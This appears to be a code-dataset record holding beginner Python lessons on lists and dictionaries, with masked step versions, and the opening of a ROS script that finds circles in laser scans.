str(temp_string_list))\ntemp_string_list.sort(key=len)\nprint('\\tSort by length of each word: ' + str(temp_string_list))\n<mask token>\nprint(\n \"\"\"\n16. Using Sorted (copy of sort) instead of sort. and reversed to avoid modifications in original list.\"\"\"\n )\n<mask token>\ny.sort()\nprint('\\t y= ' + str(y))\nprint('\\t x= ' + str(x))\n<mask token>\nprint('\\t y= ' + str(sorted(x)))\nprint('\\t x= ' + str(x))\nprint('\\t z= ' + str(list(reversed(x))))\nprint('\\t x= ' + str(x))\n",
"step-3": "print(\"\"\"\n1. Lists of Numbers\"\"\")\nprint('\\t' + str([1, 2, 3]))\nprint(\"\"\"\n2. Lists of Strings\"\"\")\nprint('\\t' + str(['Lemon', 'Mango', 'Papaya']))\nlist_fruits = ['Lemon', 'Mango', 'Papaya']\nprint('\\tMy favorite fruit is ' + list_fruits[1])\nprint(\"\"\"\n3. List operations\"\"\")\nlist_fruits[2] = 'Water Melons'\nprint('\\tNew List: ' + str(list_fruits))\nlist_Organizations = []\nprint(\"\"\"\n5. Create empty list\"\"\")\nprint('\\tList of Organizations: ' + str(list_Organizations))\nprint(\"\"\"\n5. Add values to list\"\"\")\nlist_Organizations.append('Microsoft')\nlist_Organizations.append('Amazon')\nlist_Organizations.append('Google')\nprint('\\tAppend List of Organizations: ' + str(list_Organizations))\nprint('\\tList of characters in string:' + str(list('Sandeep Dhamale')))\nprint(\"\"\"\n6. Retrieve List using for loop\"\"\")\nfor organization in list_Organizations:\n print('\\t' + organization)\nprint(\"\"\"\n7. Get specific elements within list: Slicing\"\"\")\nlist_numbers = [1, 2, 3, 4, 5]\nsub_list_numbers = list_numbers[1:3]\nprint('\\tSub list: ' + str(sub_list_numbers))\nprint('\\tLast element in list: ' + str(list_numbers[-1]))\nprint('\\tGet all elements in list except first and lasr: ' + str(\n list_numbers[1:-1]))\nprint('\\tElements from index 2 in list: ' + str(list_numbers[2:]))\nprint('\\tElements till index 4 in list: ' + str(list_numbers[:4]))\nprint(\"\"\"\n8. Copying Lists to other list\"\"\")\nlist_numbers_direct = list_numbers\nprint('\\tUsing assignment. Is list_numbers_direct is list_numbers ' + str(\n list_numbers_direct is list_numbers))\nlist_numbers_list_values = list_numbers[:]\nprint('\\tUsing assignment. Is list_numbers_list_values is list_numbers ' +\n str(list_numbers_list_values is list_numbers))\nlist_numbers_copy = list_numbers.copy()\nprint('\\tUsing assignment. Is list_numbers_copy is list_numbers ' + str(\n list_numbers_copy is list_numbers))\nlist_numbers_list = list(list_numbers)\nprint('\\tUsing assignment. Is list_numbers_list is list_numbers ' + str(\n list_numbers_list is list_numbers))\nprint(\n \"\"\"\n9. Note: Although the copies are not equal the objects inside the lists are equal\"\"\"\n )\nlist_of_list = [[1, 2], [3, 4]]\ncopy_list_of_list = list_of_list[:]\nprint('\\tcopy_list_of_list is list_of_list: ' + str(copy_list_of_list is\n list_of_list))\nprint('\\tcopy_list_of_list[element] is list_of_list[element]: ' + str(\n copy_list_of_list[0] is list_of_list[0]))\nprint('\\tEven if the values are modified e.g. append the list will be same')\nlist_of_list[0].append('a')\nprint('\\tlist_of_list: ' + str(list_of_list))\nprint('\\tcopy_list_of_list: ' + str(copy_list_of_list))\nprint('\\tcopy_list_of_list[element] is list_of_list[element]: ' + str(\n copy_list_of_list[0] is list_of_list[0]))\nprint(\n \"\"\"\n10.Search in a list: list.index() - Returns the first matched element\"\"\"\n )\ntemp_string = (\n 'Python is easy scripting language. It is easy to learn and build apps using Python.'\n )\ntemp_string_list = temp_string.split(' ')\nprint('\\tString: ' + temp_string)\nprint('\\tString list: ' + str(temp_string_list))\nprint('\\tSearch a sub string in string list using list.index(): ' + str(\n temp_string_list.index('scripting')))\nprint(\"\"\"\n11.Count occurrence of substring in list\"\"\")\nprint('\\tCount occurrence of substring Python: ' + str(temp_string_list.\n count('easy')))\nprint(\"\"\"\n12.Remove substring from string list\"\"\")\ndel temp_string_list[3]\nprint('\\tA. Remove substring from list using del (by index): ' + str(\n temp_string_list))\nprint('\\tOriginal string is unaffected: ' + str(temp_string))\ntemp_string_list.remove('learn')\nprint('\\tB. Remove substring from list using remove (by value): ' + str(\n temp_string_list))\nprint('\\tOriginal string is unaffected: ' + str(temp_string))\nprint(\"\"\"\n12.Insert a substring in string. list.insert()\"\"\")\ntemp_string_list.insert(3, 'scripting')\nprint('\\tA. Insert substring to list (at index): ' + str(temp_string_list))\nprint('\\tOriginal string is unaffected: ' + str(temp_string))\nprint(\"\"\"\n13.Concatenating lists.\"\"\")\ntemp_list_1 = [1, 2, 3]\ntemp_list_2 = [4, 5, 6]\ntemp_list = temp_list_1 + temp_list_2\nprint('\\ta. temp_list = temp_list_1 + temp_list_2 = ' + str(temp_list))\ntemp_list += temp_list\nprint('\\tb. temp_list += temp_list ' + str(temp_list))\ntemp_list.extend([7, 8, 9])\nprint('\\tc. temp_list.extend() ' + str(temp_list))\nprint(\"\"\"\n14. Reversing lists.\"\"\")\ntemp_list.reverse()\nprint('Reverse temp list: ' + str(temp_list))\nprint(\"\"\"\n15. Sorting lists.\"\"\")\ntemp_list = [5, 55, 555]\ntemp_list.sort()\nprint('\\tSorted list: ' + str(temp_list))\ntemp_list.sort(reverse=True)\nprint('\\tSorted list: ' + str(temp_list))\nprint(\"\\tSorting lists by callable functions (inbuilt) e.g. len using 'key\")\ntemp_string = 'I am a software tester.'\ntemp_string_list = temp_string.split()\nprint('\\tString list: ' + str(temp_string_list))\ntemp_string_list.sort(key=len)\nprint('\\tSort by length of each word: ' + str(temp_string_list))\ntemp_number_list = [3, 45, 12, 1, 99, 44]\nprint(\n \"\"\"\n16. Using Sorted (copy of sort) instead of sort. and reversed to avoid modifications in original list.\"\"\"\n )\nx = [4, 9, 2, 1]\ny = x\ny.sort()\nprint('\\t y= ' + str(y))\nprint('\\t x= ' + str(x))\nx = [4, 9, 2, 1]\nprint('\\t y= ' + str(sorted(x)))\nprint('\\t x= ' + str(x))\nprint('\\t z= ' + str(list(reversed(x))))\nprint('\\t x= ' + str(x))\n",
"step-4": "# Lists are sequence of objects\n# Mutable\n# Lists are represented within square brackets and items are seperated by commas\n\n#-----------------------------------Lists-----------------------------------#\n# Lists of Numbers\nprint(\"\\n1. Lists of Numbers\")\nprint(\"\\t\" + str([1,2,3]))\n\n# Lists of Strings\nprint(\"\\n2. Lists of Strings\")\nprint(\"\\t\" + str([\"Lemon\",\"Mango\",\"Papaya\"]))\n\nlist_fruits =[\"Lemon\",\"Mango\",\"Papaya\"]\nprint(\"\\tMy favorite fruit is \" + list_fruits[1])\n\nprint(\"\\n3. List operations\")\n#Replace items within list\nlist_fruits[2]=\"Water Melons\"\nprint(\"\\tNew List: \" + str(list_fruits))\n\n#Create Empty List\nlist_Organizations = []\nprint(\"\\n5. Create empty list\")\nprint(\"\\tList of Organizations: \" + str(list_Organizations))\n\n#Add values to list\nprint(\"\\n5. Add values to list\")\nlist_Organizations.append(\"Microsoft\")\nlist_Organizations.append(\"Amazon\")\nlist_Organizations.append(\"Google\")\nprint(\"\\tAppend List of Organizations: \" + str(list_Organizations))\n\n#List of characters within string\nprint(\"\\tList of characters in string:\" + str(list(\"Sandeep Dhamale\")))\n\n# Retrieve List using for loop\nprint(\"\\n6. Retrieve List using for loop\")\nfor organization in list_Organizations:\n print(\"\\t\" + organization)\n\n# Get specific elements within list: Slicing\nprint(\"\\n7. Get specific elements within list: Slicing\")\nlist_numbers = [1,2,3,4,5]\nsub_list_numbers = list_numbers[1:3]\nprint(\"\\tSub list: \" + str(sub_list_numbers))\nprint(\"\\tLast element in list: \" + str(list_numbers[-1]))\nprint(\"\\tGet all elements in list except first and lasr: \" + str(list_numbers[1:-1]))\nprint(\"\\tElements from index 2 in list: \" + str(list_numbers[2:]))\nprint(\"\\tElements till index 4 in list: \" + str(list_numbers[:4]))\n\n#Copying Lists to other list - Shallow copy\nprint(\"\\n8. Copying Lists to other list\")\nlist_numbers_direct = list_numbers\nprint(\"\\tUsing assignment. Is list_numbers_direct is list_numbers \" + str(list_numbers_direct is list_numbers))\n\nlist_numbers_list_values = list_numbers[:]\nprint(\"\\tUsing assignment. Is list_numbers_list_values is list_numbers \" + str(list_numbers_list_values is list_numbers))\n\nlist_numbers_copy = list_numbers.copy()\nprint(\"\\tUsing assignment. Is list_numbers_copy is list_numbers \" + str(list_numbers_copy is list_numbers))\n\nlist_numbers_list = list(list_numbers)\nprint(\"\\tUsing assignment. Is list_numbers_list is list_numbers \" + str(list_numbers_list is list_numbers))\n\nprint(\"\\n9. Note: Although the copies are not equal the objects inside the lists are equal\")\nlist_of_list = [[1,2],[3,4]]\ncopy_list_of_list = list_of_list[:]\nprint(\"\\tcopy_list_of_list is list_of_list: \" + str(copy_list_of_list is list_of_list))\nprint(\"\\tcopy_list_of_list[element] is list_of_list[element]: \" + str(copy_list_of_list[0] is list_of_list[0]))\nprint(\"\\tEven if the values are modified e.g. append the list will be same\")\nlist_of_list[0].append('a')\nprint(\"\\tlist_of_list: \" + str(list_of_list))\nprint(\"\\tcopy_list_of_list: \" + str(copy_list_of_list))\nprint(\"\\tcopy_list_of_list[element] is list_of_list[element]: \" + str(copy_list_of_list[0] is list_of_list[0]))\n\nprint(\"\\n10.Search in a list: list.index() - Returns the first matched element\")\ntemp_string = \"Python is easy scripting language. It is easy to learn and build apps using Python.\"\ntemp_string_list = temp_string.split(\" \")\nprint(\"\\tString: \" + temp_string)\nprint(\"\\tString list: \" + str(temp_string_list))\nprint(\"\\tSearch a sub string in string list using list.index(): \" + str(temp_string_list.index(\"scripting\")))\n\nprint(\"\\n11.Count occurrence of substring in list\")\nprint(\"\\tCount occurrence of substring Python: \" + str(temp_string_list.count(\"easy\")))\n\nprint(\"\\n12.Remove substring from string list\")\ndel temp_string_list[3]\nprint(\"\\tA. Remove substring from list using del (by index): \" + str(temp_string_list))\nprint(\"\\tOriginal string is unaffected: \" + str(temp_string))\n\ntemp_string_list.remove(\"learn\")\nprint(\"\\tB. Remove substring from list using remove (by value): \" + str(temp_string_list))\nprint(\"\\tOriginal string is unaffected: \" + str(temp_string))\n\nprint(\"\\n12.Insert a substring in string. list.insert()\")\ntemp_string_list.insert(3, \"scripting\")\nprint(\"\\tA. Insert substring to list (at index): \" + str(temp_string_list))\nprint(\"\\tOriginal string is unaffected: \" + str(temp_string))\n\nprint(\"\\n13.Concatenating lists.\")\ntemp_list_1=[1,2,3]\ntemp_list_2 = [4,5,6]\ntemp_list = temp_list_1 + temp_list_2\nprint(\"\\ta. temp_list = temp_list_1 + temp_list_2 = \" + str(temp_list))\ntemp_list+=temp_list\nprint(\"\\tb. temp_list += temp_list \" + str(temp_list))\ntemp_list.extend([7,8,9])\nprint(\"\\tc. temp_list.extend() \" + str(temp_list))\n\nprint(\"\\n14. Reversing lists.\")\ntemp_list.reverse()\nprint(\"Reverse temp list: \"+ str(temp_list))\n\nprint(\"\\n15. Sorting lists.\")\ntemp_list = [5,55,555]\ntemp_list.sort()\nprint(\"\\tSorted list: \" + str(temp_list))\ntemp_list.sort(reverse=True)\nprint(\"\\tSorted list: \" + str(temp_list))\nprint(\"\\tSorting lists by callable functions (inbuilt) e.g. len using 'key\")\ntemp_string = \"I am a software tester.\"\ntemp_string_list = temp_string.split()\nprint(\"\\tString list: \" + str(temp_string_list))\ntemp_string_list.sort(key=len)\nprint(\"\\tSort by length of each word: \" + str(temp_string_list))\ntemp_number_list=[3,45,12,1,99,44]\n\nprint(\"\\n16. Using Sorted (copy of sort) instead of sort. and reversed to avoid modifications in original list.\")\nx=[4, 9, 2, 1]\ny = x\ny.sort()\nprint(\"\\t y= \" + str(y))\nprint(\"\\t x= \" + str(x))\n\nx=[4, 9, 2, 1]\nprint(\"\\t y= \" + str(sorted(x)))\nprint(\"\\t x= \" + str(x))\nprint(\"\\t z= \" + str(list(reversed(x))))\nprint(\"\\t x= \" + str(x))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print('dict_test: ', dict_test)
<|reserved_special_token_0|>
for key in range(0, int(elem_dict)):
key = input('dict key: ')
user_input_dict[key] = input('dict value:')
print(user_input_dict)
<|reserved_special_token_0|>
dict_test.pop(int(del_key))
print(dict_test)
<|reserved_special_token_0|>
print(list_test)
try:
print(list_test[5])
except IndexError as message:
print('list index out of range')
try:
print(dict_test[7])
except KeyError as message:
dict_test[7] = 'KeyError: 7'
print(dict_test)
<|reserved_special_token_0|>
while work == True:
print('Your personal database is work, you have this base:')
print(user_dict)
print('if you want add record press 1')
print('if you wand delete record press 2')
print('if you wand change record press 3')
print('if you want exit press 4')
user_numb = input()
if user_numb.isdigit() == False:
continue
if int(user_numb) == 1:
print('write key of record:')
key = input()
print('write value for your key:')
value = input()
if key.isdigit() == True:
key = int(key)
if value.isdigit() == True:
value = int(value)
user_dict.update({key: value})
elif int(user_numb) == 2:
print(user_dict)
print('what number of record you want to delete?')
del_key = input()
if del_key.isdigit() == False:
print('This is not correct number!')
continue
elif int(del_key) > len(user_dict) or int(del_key) <= 0:
print('Your base doesnot have this number!')
continue
user_dict.pop(int(del_key) + 1)
elif int(user_numb) == 3:
print('What number of record you want to change?')
reg_key = input()
if reg_key.isdigit() == False:
print('This is not number!')
continue
elif int(reg_key) > len(user_dict) or int(reg_key) <= 0:
print('Your base doesnt have this number!')
continue
print('write value for your key:')
value = input()
if value.isdigit() == True:
value = int(value)
user_dict[int(reg_key) - 1] = value
elif int(user_numb) == 4:
work = False
else:
print('your input false, please write true number!')
<|reserved_special_token_1|>
my_information = {'name': 'Vilen', 'last_name': 'Mateush', 'how_old': 31,
'born_town': 'Khmelniysky'}
dict_test = {key: (key ** 2) for key in range(7)}
print('dict_test: ', dict_test)
elem_dict = 0
elem_dict = input('input number of elements:')
user_input_dict = {}
for key in range(0, int(elem_dict)):
key = input('dict key: ')
user_input_dict[key] = input('dict value:')
print(user_input_dict)
del_key = 0
del_key = input('input key for remove:')
dict_test.pop(int(del_key))
print(dict_test)
list_test = [elem for elem in range(5)]
print(list_test)
try:
print(list_test[5])
except IndexError as message:
print('list index out of range')
try:
print(dict_test[7])
except KeyError as message:
dict_test[7] = 'KeyError: 7'
print(dict_test)
work = True
user_dict = {}
user_numb = 0
while work == True:
print('Your personal database is work, you have this base:')
print(user_dict)
print('if you want add record press 1')
print('if you wand delete record press 2')
print('if you wand change record press 3')
print('if you want exit press 4')
user_numb = input()
if user_numb.isdigit() == False:
continue
if int(user_numb) == 1:
print('write key of record:')
key = input()
print('write value for your key:')
value = input()
if key.isdigit() == True:
key = int(key)
if value.isdigit() == True:
value = int(value)
user_dict.update({key: value})
elif int(user_numb) == 2:
print(user_dict)
print('what number of record you want to delete?')
del_key = input()
if del_key.isdigit() == False:
print('This is not correct number!')
continue
elif int(del_key) > len(user_dict) or int(del_key) <= 0:
print('Your base doesnot have this number!')
continue
user_dict.pop(int(del_key) + 1)
elif int(user_numb) == 3:
print('What number of record you want to change?')
reg_key = input()
if reg_key.isdigit() == False:
print('This is not number!')
continue
elif int(reg_key) > len(user_dict) or int(reg_key) <= 0:
print('Your base doesnt have this number!')
continue
print('write value for your key:')
value = input()
if value.isdigit() == True:
value = int(value)
user_dict[int(reg_key) - 1] = value
elif int(user_numb) == 4:
work = False
else:
print('your input false, please write true number!')
<|reserved_special_token_1|>
# lesson 4 Mateush Vilen
my_information = {
'name': 'Vilen',
'last_name': 'Mateush',
'how_old': 31,
'born_town': 'Khmelniysky'
}
dict_test = {key: key**2 for key in range(7)}
print('dict_test: ', dict_test)
elem_dict = 0
elem_dict = input('input number of elements:')
user_input_dict = {}
for key in range(0, int(elem_dict)):
key = input('dict key: ')
user_input_dict[key] = input('dict value:')
print(user_input_dict)
del_key = 0
del_key = input('input key for remove:')
dict_test.pop(int(del_key))
print(dict_test)
list_test = [elem for elem in range(5)]
print(list_test)
try:
print(list_test[5])
except IndexError as message:
print('list index out of range')
try:
print(dict_test[7])
except KeyError as message:
dict_test[7] = 'KeyError: 7'
print(dict_test)
# ------------My database------------:
work = True
user_dict = {}
user_numb = 0
while work == True:
print('Your personal database is work, you have this base:')
print(user_dict)
print('if you want add record press 1')
print('if you wand delete record press 2')
print('if you wand change record press 3')
print('if you want exit press 4')
user_numb = input()
if user_numb.isdigit() == False:
continue
if int(user_numb) == 1:
print('write key of record:')
key = input()
print('write value for your key:')
value = input()
if key.isdigit() == True:
key = int(key)
if value.isdigit() == True:
value = int(value)
user_dict.update({key: value})
elif int(user_numb) == 2:
print(user_dict)
print('what number of record you want to delete?')
del_key = input()
if del_key.isdigit() == False:
print('This is not correct number!')
continue
elif int(del_key) > len(user_dict) or int(del_key) <= 0:
print('Your base doesnot have this number!')
continue
user_dict.pop(int(del_key)+1)
elif int(user_numb) == 3:
print('What number of record you want to change?')
reg_key = input()
if reg_key.isdigit() == False:
print('This is not number!')
continue
elif int(reg_key) > len(user_dict) or int(reg_key) <= 0:
print('Your base doesnt have this number!')
continue
print('write value for your key:')
value = input()
if value.isdigit() == True:
value = int(value)
user_dict[int(reg_key)-1] = value
elif int(user_numb) == 4:
work = False
else:
print('your input false, please write true number!')
|
flexible
|
{
"blob_id": "b000f293b50970233d5b71abc3e10e2ad57a3fc7",
"index": 1767,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('dict_test: ', dict_test)\n<mask token>\nfor key in range(0, int(elem_dict)):\n key = input('dict key: ')\n user_input_dict[key] = input('dict value:')\nprint(user_input_dict)\n<mask token>\ndict_test.pop(int(del_key))\nprint(dict_test)\n<mask token>\nprint(list_test)\ntry:\n print(list_test[5])\nexcept IndexError as message:\n print('list index out of range')\ntry:\n print(dict_test[7])\nexcept KeyError as message:\n dict_test[7] = 'KeyError: 7'\nprint(dict_test)\n<mask token>\nwhile work == True:\n print('Your personal database is work, you have this base:')\n print(user_dict)\n print('if you want add record press 1')\n print('if you wand delete record press 2')\n print('if you wand change record press 3')\n print('if you want exit press 4')\n user_numb = input()\n if user_numb.isdigit() == False:\n continue\n if int(user_numb) == 1:\n print('write key of record:')\n key = input()\n print('write value for your key:')\n value = input()\n if key.isdigit() == True:\n key = int(key)\n if value.isdigit() == True:\n value = int(value)\n user_dict.update({key: value})\n elif int(user_numb) == 2:\n print(user_dict)\n print('what number of record you want to delete?')\n del_key = input()\n if del_key.isdigit() == False:\n print('This is not correct number!')\n continue\n elif int(del_key) > len(user_dict) or int(del_key) <= 0:\n print('Your base doesnot have this number!')\n continue\n user_dict.pop(int(del_key) + 1)\n elif int(user_numb) == 3:\n print('What number of record you want to change?')\n reg_key = input()\n if reg_key.isdigit() == False:\n print('This is not number!')\n continue\n elif int(reg_key) > len(user_dict) or int(reg_key) <= 0:\n print('Your base doesnt have this number!')\n continue\n print('write value for your key:')\n value = input()\n if value.isdigit() == True:\n value = int(value)\n user_dict[int(reg_key) - 1] = value\n elif int(user_numb) == 4:\n work = False\n else:\n print('your input false, please write true number!')\n",
"step-3": "my_information = {'name': 'Vilen', 'last_name': 'Mateush', 'how_old': 31,\n 'born_town': 'Khmelniysky'}\ndict_test = {key: (key ** 2) for key in range(7)}\nprint('dict_test: ', dict_test)\nelem_dict = 0\nelem_dict = input('input number of elements:')\nuser_input_dict = {}\nfor key in range(0, int(elem_dict)):\n key = input('dict key: ')\n user_input_dict[key] = input('dict value:')\nprint(user_input_dict)\ndel_key = 0\ndel_key = input('input key for remove:')\ndict_test.pop(int(del_key))\nprint(dict_test)\nlist_test = [elem for elem in range(5)]\nprint(list_test)\ntry:\n print(list_test[5])\nexcept IndexError as message:\n print('list index out of range')\ntry:\n print(dict_test[7])\nexcept KeyError as message:\n dict_test[7] = 'KeyError: 7'\nprint(dict_test)\nwork = True\nuser_dict = {}\nuser_numb = 0\nwhile work == True:\n print('Your personal database is work, you have this base:')\n print(user_dict)\n print('if you want add record press 1')\n print('if you wand delete record press 2')\n print('if you wand change record press 3')\n print('if you want exit press 4')\n user_numb = input()\n if user_numb.isdigit() == False:\n continue\n if int(user_numb) == 1:\n print('write key of record:')\n key = input()\n print('write value for your key:')\n value = input()\n if key.isdigit() == True:\n key = int(key)\n if value.isdigit() == True:\n value = int(value)\n user_dict.update({key: value})\n elif int(user_numb) == 2:\n print(user_dict)\n print('what number of record you want to delete?')\n del_key = input()\n if del_key.isdigit() == False:\n print('This is not correct number!')\n continue\n elif int(del_key) > len(user_dict) or int(del_key) <= 0:\n print('Your base doesnot have this number!')\n continue\n user_dict.pop(int(del_key) + 1)\n elif int(user_numb) == 3:\n print('What number of record you want to change?')\n reg_key = input()\n if reg_key.isdigit() == False:\n print('This is not number!')\n continue\n elif int(reg_key) > len(user_dict) or int(reg_key) <= 0:\n print('Your base doesnt have this number!')\n continue\n print('write value for your key:')\n value = input()\n if value.isdigit() == True:\n value = int(value)\n user_dict[int(reg_key) - 1] = value\n elif int(user_numb) == 4:\n work = False\n else:\n print('your input false, please write true number!')\n",
"step-4": "# lesson 4 Mateush Vilen\n\nmy_information = {\n 'name': 'Vilen',\n 'last_name': 'Mateush',\n 'how_old': 31,\n 'born_town': 'Khmelniysky'\n}\n\ndict_test = {key: key**2 for key in range(7)}\nprint('dict_test: ', dict_test)\n\nelem_dict = 0\nelem_dict = input('input number of elements:')\nuser_input_dict = {}\nfor key in range(0, int(elem_dict)):\n key = input('dict key: ')\n user_input_dict[key] = input('dict value:')\nprint(user_input_dict)\n\ndel_key = 0\ndel_key = input('input key for remove:')\ndict_test.pop(int(del_key))\nprint(dict_test)\n\nlist_test = [elem for elem in range(5)]\nprint(list_test)\ntry:\n print(list_test[5])\nexcept IndexError as message:\n print('list index out of range')\n\ntry:\n print(dict_test[7])\nexcept KeyError as message:\n dict_test[7] = 'KeyError: 7'\nprint(dict_test)\n\n\n# ------------My database------------:\nwork = True\nuser_dict = {}\nuser_numb = 0\nwhile work == True:\n print('Your personal database is work, you have this base:')\n print(user_dict)\n print('if you want add record press 1')\n print('if you wand delete record press 2')\n print('if you wand change record press 3')\n print('if you want exit press 4')\n user_numb = input()\n if user_numb.isdigit() == False:\n continue\n if int(user_numb) == 1:\n print('write key of record:')\n key = input()\n print('write value for your key:')\n value = input()\n if key.isdigit() == True:\n key = int(key)\n if value.isdigit() == True:\n value = int(value)\n user_dict.update({key: value})\n elif int(user_numb) == 2:\n print(user_dict)\n print('what number of record you want to delete?')\n del_key = input()\n if del_key.isdigit() == False:\n print('This is not correct number!')\n continue\n elif int(del_key) > len(user_dict) or int(del_key) <= 0:\n print('Your base doesnot have this number!')\n continue\n user_dict.pop(int(del_key)+1)\n elif int(user_numb) == 3:\n print('What number of record you want to change?')\n reg_key = input()\n if reg_key.isdigit() == False:\n print('This is not number!')\n continue\n elif int(reg_key) > len(user_dict) or int(reg_key) <= 0:\n print('Your base doesnt have this number!')\n continue\n print('write value for your key:')\n value = input()\n if value.isdigit() == True:\n value = int(value)\n user_dict[int(reg_key)-1] = value\n elif int(user_numb) == 4:\n work = False\n else:\n print('your input false, please write true number!')\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python
#-------------------------------------------------------------------------------
#
# Circle finder.
#
# Rowan Leeder
#
#-------------------------------------------------------------------------------
#
# Listens on the 'scan' and 'base_scan' topics. These are the pioneers SICK
# topic and Stage's scan topic respectively.
#
# The program strips out noise samples and attempts to match circles to the
# remaining samples.
#
# Any circle that is found is then published on the 'circles' topic in a
# circleArray message.
#
# The circleArray and circleEntry messages are defined in the msg\ folder.
#
#-------------------------------------------------------------------------------
#
# Compile Commands:
#
# First run 'rosmake' in the base directory. If you change the messages in any
# way then you will have to close all ros components using the topic (basically
# everything) and then recompile with rosmake. If you add a message, add an
# entry to the manifest file.
#
# To run this program do 'rosrun circleFinder finder.py'.
#
# Exit with Ctrl + C.
#
# Listen in with 'rostopic echo circles'
#
# If you want to see a plot of the data, set the 'plot' variable to True.
#
#-------------------------------------------------------------------------------
# Known Bugs:
# If the laser scan covers 360 degrees then you might get two circles at the
# same spot. This is becuase i haven't joined the two ends of the scan together.
# This will not be an issue with the robots as they only take 180 degree scans.
# Ros imports.
import roslib;
roslib.load_manifest('circleFinder')
import rospy
from sensor_msgs.msg import LaserScan
from roslib.rostime import Duration
# Python lib imports.
import math
import time
# Message imports
from circleFinder.msg import *
# Local file imports.
from placment_funcs import *
from data_parser import *
# plot functions are in here. Remove if you dont want and you might free up
# some memory.
from plot_funcs import *
#-------------------------------------------------------------------------------
# Function: callback
#
# Thread created when a laser scan is received on a listening topic and extract
# and publish a specified number of circle from the data.
#
#-------------------------------------------------------------------------------
#
# args - An array of arguments. The form is:
# max_dist - the maximum distance to look for circles. If a sample or
# circle edge goes beyond this then it will be ignored.
# max_rad - The maximum radius that a valid circle can have.
# min_rad - The minimum radius that a valid circle can have.
# grad_tol - The tolerance used in the prune function.
# split_multi - The multiplier used in the split function
#
# publish - A circleArray object containing the circle data in an array of
# circleEntry objects. These classes are defined in the
# circleFinder/msg path.
#-------------------------------------------------------------------------------
def callback(data, args):
tStart = time.time()
pub = args[0]
max_dist = args[1]
max_rad = args[2]
min_rad = args[3]
grad_tol = args[4]
split_multi = args[5]
prune_lines = args[6]
plot = args[7]
# Get possible circle data.
possibles = dataParser(data,max_dist, grad_tol, split_multi, prune_lines)
# Calculate the circle info from that data.
circles = []
for i in possibles:
current = matchCirc(list(i), False)
if current is not None:
#prune out any circles that are too large or small
if current[1] > max_rad or \
current[1] < min_rad or \
math.sqrt(math.pow(current[0][0],2) + math.pow(current[0][1],2)) + current[1] > max_dist:
pass
else:
circles.append(current)
# Setup circleArray and publish found circles.
ret = []
for i in circles:
c = circleEntry()
c.x = i[0][0]
c.y = i[0][1]
c.distance = math.sqrt(i[0][0]*i[0][0] + i[0][1] * i[0][1])
c.theta = math.atan2(i[0][1], i[0][0])
c.radius = i[1]
ret.append(c)
m = circleArray()
m.broadcastTime = rospy.get_rostime()
m.duration = time.time() - tStart
m.array = ret
if not rospy.is_shutdown():
pub.publish(m)
if plot:
import matplotlib.pyplot as plt
plotWorld(data, 30, True, 'ro')
for i in circles:
plotCircle((i[0])[0],(i[0])[1],i[1])
for i in possibles:
for u in i:
plt.plot(u[0], u[1], 'bo')
plt.plot(0,0,'ro')
plotAxis(8,-8,8,-8,4)
plt.axis([-8,8,-8,8])
plt.show()
#-------------------------------------------------------------------------------
# Function: main
#
# Sets up the callback function and then idles.
#
# Program arguments are inside.
#
#-------------------------------------------------------------------------------
if __name__ == '__main__':
#print dir()
# the publiser
pub = rospy.Publisher("circles", circleArray)
# The maximum distance from the origin that a sample point or circle edge
# can be before they are considered invalid.
max_dist = 7
# The maximum radius a circle can be before it is considered invalid.
max_rad = 0.25
# The maximum radius a circle can be before it is considered invalid.
min_rad = 0
# See the prune function in data_parser.py
grad_tol = 0.3
# See the split function in data_parser.py
split_multi = 2.5
# If true then an attempt to remove straight edges from the data will be
# made.
prune_lines = True
# Plot flag.
plot = False
import sys
if (len(sys.argv) > 1):
for i in sys.argv:
if i == '--plot':
plot = True
elif i == '--no-line-pruning':
prune_lines = False
args = [pub, max_dist, max_rad, min_rad, grad_tol, split_multi, prune_lines , plot]
print "--------------------------------------------------------------------------------"
print "Circle Finder"
print
print "--------------------------------------------------------------------------------"
print "Command line arguments are:"
print " --plot Will cause the outcome of the first scan to be plotted."
print " --no-line-pruning Will prevent straight lines from being removed from the"
print " scan."
print
print "--------------------------------------------------------------------------------"
print "Starting circle finder with arguments:"
print
print " Publisher: " , pub
print " Maximum Distance: " , max_dist
print " Maximum Radius: " , max_rad
print " Minimum Radius: " , min_rad
print " Gradient Tolerance: " , grad_tol
print " Split Multiplier: " , split_multi
print " Remove Lines: " , prune_lines
print " Plot: " , plot
print
print "--------------------------------------------------------------------------------"
print "To increase speed, the listening thread is not verbose."
print "Ctrl+C to exit."
rospy.init_node('circles', anonymous=True)
rospy.Subscriber("base_scan",LaserScan, callback, callback_args=args)
rospy.Subscriber("scan",LaserScan, callback, callback_args=args)
rospy.spin()
|
normal
|
{
"blob_id": "3ac02308959749b8cd264e660c3d6334fd385fd4",
"index": 1114,
"step-1": "#!/usr/bin/env python\n#-------------------------------------------------------------------------------\n#\n# Circle finder.\n#\n# Rowan Leeder\n#\n#-------------------------------------------------------------------------------\n#\n# Listens on the 'scan' and 'base_scan' topics. These are the pioneers SICK\n# topic and Stage's scan topic respectively.\n#\n# The program strips out noise samples and attempts to match circles to the\n# remaining samples.\n#\n# Any circle that is found is then published on the 'circles' topic in a\n# circleArray message.\n#\n# The circleArray and circleEntry messages are defined in the msg\\ folder.\n#\n#-------------------------------------------------------------------------------\n#\n# Compile Commands:\n#\n# First run 'rosmake' in the base directory. If you change the messages in any\n# way then you will have to close all ros components using the topic (basically\n# everything) and then recompile with rosmake. If you add a message, add an \n# entry to the manifest file. \n#\n# To run this program do 'rosrun circleFinder finder.py'. \n#\n# Exit with Ctrl + C.\n#\n# Listen in with 'rostopic echo circles'\n#\n# If you want to see a plot of the data, set the 'plot' variable to True.\n#\n#-------------------------------------------------------------------------------\n# Known Bugs:\n# If the laser scan covers 360 degrees then you might get two circles at the \n# same spot. This is becuase i haven't joined the two ends of the scan together.\n# This will not be an issue with the robots as they only take 180 degree scans.\n\n# Ros imports.\nimport roslib; \nroslib.load_manifest('circleFinder')\nimport rospy\nfrom sensor_msgs.msg import LaserScan\nfrom roslib.rostime import Duration \n\n# Python lib imports.\nimport math\nimport time\n\n# Message imports\nfrom circleFinder.msg import *\n\n# Local file imports.\nfrom placment_funcs import *\nfrom data_parser import *\n\n# plot functions are in here. Remove if you dont want and you might free up \n# some memory.\nfrom plot_funcs import 